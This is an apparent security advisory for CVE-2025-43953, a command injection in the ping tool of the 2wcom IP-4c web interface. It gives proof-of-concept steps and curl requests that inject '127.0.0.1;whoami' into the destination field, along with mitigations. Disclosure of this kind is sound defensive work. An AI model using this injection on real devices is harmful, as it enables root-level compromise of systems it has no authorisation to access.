CVE-2025-43953: Authenticated RCE in 2wcom IP-4c Web Interface via Command Injection

### Critical Vulnerability Information #### Vulnerability ID CVE-2025-43953 #### Vulnerability Description The web interface of 2wcom IP-4c allows authenticated attackers to perform remote code execution (RCE) via command injection. This occurs due to improper input sanitization in the ping tool configuration, leading to direct execution in the system shell. #### Product Information - **Name**: 2wcom IP-4c - **Firmware/Software Versions**: - Bundle Version: 2.15.5 - Ping/TraceRoute System Version: 2.78 / 2.02 - **Application Version**: 1.0.0 - **Web Interface Version**: 3.54 - **FPGA Version**: 1.76b6 / 0 - **System Controller Version**: 1.07 - **SNMP MIB Version**: 1.4 - **Kernel Version**: Linux version 01.25-r0 - **Codec Versions**: - MPV Encoder: 1.5.0 - MPV Decoder: 2.7.0 - MP3 Encoder: 5.1.2 - MP3 Decoder: 5.6.0 - AAC Encoder: 3.1.0 - xHE-AAC Encoder: 04.05.04 - AAC Decoder: 2.1.1 - Opus: 1.3.1 - G711: 1.7 - HW Version XPSXP: 1.02 / 1.10 #### Vulnerability Type - Remote Code Execution (Authenticated) #### Attack Vector - Network (Web Interface) #### Vulnerable Endpoints - `/cgi-bin/cam-request?cmd_data.ping&store=1` - `/cgi-bin/cam-request?cmd_ping.php` - `/cgi-bin/cam-request/check_trace.php` - `/cgi-cgi` (via Web Interface accessing Ping TraceModule) #### Exploitation Method ##### Exploitation via Web Interface 1. Log in as admin. 2. Navigate to `/cgi-bin/cam-request?cmd_data.ping&store=1`. 3. Set Destination (IP) to `127.0.0.1;whoami`. 4. Submit and wait for ping response. 5. The response will include the output of the `whoami` command. ##### Exploitation via API (cURL Example) 1. Send command injection: ```bash curl 'http:///cgi-bin/cam-request?cmd_data.ping&store=1' \ -X POST \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data-urlencode 'destination=127.0.0.1%3Bwhoami' ``` 2. Check response: ```bash curl 'http:///cgi-bin/cam-request/cmd_ping.php' \ -X POST \ -H 'Cookie: PHPSESSID=' ``` #### Impact - Full system compromise as root - Remote execution of arbitrary commands - Potential lateral movement within the network #### Discoverer Mohamed Shahat #### Reference Links https://www.cve.org/CVERecord?id=CVE-2025-43953 #### Recommended Mitigation - Sanitize user input in ping tool configuration (e.g., `ls`, `id`, etc.) - Use secure APIs instead of direct shell execution - Implement role-based access control #### Temporary Workarounds - Restrict access to `/cgi-bin/cam-request*` endpoints using firewall rules or VPN - Monitor system logs for suspicious ping tool usage

Goal Reached Thanks to every supporter — we hit 100%!

CVE-2025-43953: Authenticated RCE in 2wcom IP-4c Web Interface via Command Injection

More from this source